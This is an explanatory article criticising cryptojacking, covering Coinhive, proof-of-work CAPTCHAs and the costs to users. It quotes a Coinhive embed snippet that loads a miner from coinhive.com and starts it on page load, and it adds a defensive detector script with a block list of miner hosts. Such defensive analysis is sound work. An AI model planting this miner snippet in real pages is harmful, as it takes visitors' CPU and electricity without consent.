Cryptojacking: cryptography in the service of the Devil
A new revenue stream appeared toward the end of last year. Cryptojacking may not yet have received the attention it deserves, but it is already widely used. Most Internet consumers are not aware of it, though its intentions are far from innocent. It may also create inequalities among Internet users.
Cryptojacking means using the visitor's device processor, with or without his consent, to mine cryptocurrency while he is on a given webpage. The page is not necessarily compromised: it may do this on purpose. Mining starts instantly upon visiting the page. In its most nefarious form, cryptojacking requires no permission or any other effort from the user in order to run. In other words, cryptojacking consists in hijacking the user's devices (computer, smartphone, tablet, etc.) to pilfer digital profit.
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.User('<site-key>', 'john-doe');
        miner.start();
    </script>
This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running.
Let us know what you think in the comments. Do you want ads or do you want to give away a few of your CPU cycles every time you visit the site? *
Personally, I see such an approach as equivalent to asking someone for permission to rape him. That said, I remember reading somewhere else that most PirateBay users accepted in-browser mining to reduce ads. Since then, copycats have been cropping up, claiming to raise funds or to reduce ads. Nefarious attackers can also mine digital money for themselves by compromising a website and taking advantage of its traffic [3]. There was even a Google Chrome extension [4] that was removed from the Web Store for mining cryptocurrency in the background without the knowledge or consent of its users.
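The include shown above is easy to spot once you know what to look for, and that is exactly what the blocker extensions and web proxies of the time did: match script sources against a list of miner hosts. The following is an added example, not code from the article or from Coinhive, that scans a page's HTML for an external miner include (by host) and for the inline constructor call of the Coinhive client API. The sample page is constructed for the example; coinhive.com is the host named in the article, while coin-hive.com is an assumed alias added only to show the list is extensible.

```javascript
// Added example (not from the original article): scan a page's HTML for an
// in-browser miner include. Runs offline on a constructed sample page.

// Constructed sample page (assumption: not a real site).
const SAMPLE_HTML = `
<html><head>
  <script src="https://cdn.example.com/jquery.min.js"></script>
  <script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
  <script>
    var miner = new CoinHive.User('SITE_KEY', 'john-doe');
    miner.start();
  </script>
</body></html>`;

// Hosts known to serve mining libraries. coinhive.com is named in the article;
// coin-hive.com is an assumed alias, added for illustration only.
const MINER_HOSTS = new Set(['coinhive.com', 'coin-hive.com']);

// <script ... src="..."> in any attribute order.
const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
// Inline scripts (no src attribute), capturing the body.
const INLINE_SCRIPT_RE = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
// Constructor of the Coinhive client API as used on the page.
const MINER_API_RE = /new\s+CoinHive\.(User|Anonymous)\s*\(/;

function hostOf(src) {
  // Protocol-relative URLs (//coinhive.com/...) need a scheme before parsing.
  const full = src.startsWith('//') ? 'https:' + src : src;
  try {
    return new URL(full).hostname.toLowerCase();
  } catch (e) {
    return null; // relative path such as /js/app.js: no remote host
  }
}

// Returns one finding per external miner include and per inline miner script.
function findMinerScripts(html, minerHosts = MINER_HOSTS) {
  const findings = [];
  let m;
  while ((m = SCRIPT_SRC_RE.exec(html)) !== null) {
    const host = hostOf(m[1]);
    if (host && minerHosts.has(host)) {
      findings.push({ type: 'external', host, src: m[1] });
    }
  }
  while ((m = INLINE_SCRIPT_RE.exec(html)) !== null) {
    if (MINER_API_RE.test(m[1])) {
      findings.push({ type: 'inline', snippet: m[1].trim().split('\n')[0].trim() });
    }
  }
  return findings;
}

// The site-side fix: a script-src directive naming only the origins you
// expect. Without 'unsafe-inline' the browser also refuses the inline miner.
function scriptSrcCsp(allowedHosts) {
  return `script-src 'self' ${allowedHosts.map(h => 'https://' + h).join(' ')}`;
}

console.log(findMinerScripts(SAMPLE_HTML));
console.log(scriptSrcCsp(['cdn.example.com']));
```

Host matching only catches the lazy case; a miner served from the site's own origin, or from a freshly registered domain, slips through, which is why the extension route and the CPU-usage heuristics of later blockers complemented the lists.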
To prevent spam, websites present a challenge-response test in the form of a CAPTCHA that the visitor has to solve, in order to check whether it is a human or a machine. Nowadays, though, you have most probably already encountered a website that relies on a proof-of-work (POW) CAPTCHA instead. The concept of the POW CAPTCHA [5] is to make your CPU solve a mathematical puzzle: in the Coinhive variant, the puzzle is a number of hashes computed for the Monero blockchain, so the "proof" that the visitor spent some effort is at the same time mining work credited to the site owner.
This is what a POW CAPTCHA looks like:
While this technique makes your surfing easier and flatters your laziness, in that you do not need to solve the CAPTCHA manually, you pay the website by letting it use your CPU and raise your electricity bill. And depending on the speed and power of your machine, you may wait more or less than other visitors before being able to browse the website in question.
Running several cryptojacking webpages at once may have dramatic consequences for an overwhelmed processor: that can range from interrupted work to data loss, a glitch in an organization's network, or even damaged hardware (as was the case with the infamous Android trojan called Loapi [6]). There is also a simpler yet effective impact of frequently landing on cryptojacking webpages: your electricity bill goes up, since the CPU of your machine is "forced" to work harder.
A POW CAPTCHA will hardly prevent spamming, since spam is mostly sent by botnets [8], so the attacker does not care how much CPU power is taken from the machines under his control. On the other hand, cryptojacking degrades the browsing experience, and maybe one day everybody will have to buy a more expensive computer in order to surf the Internet, or pay a higher electricity bill to read the news online instead of paying for a conventional subscription. Definitely, given our nature as humans, cryptojacking may become a source of inequality among Internet consumers.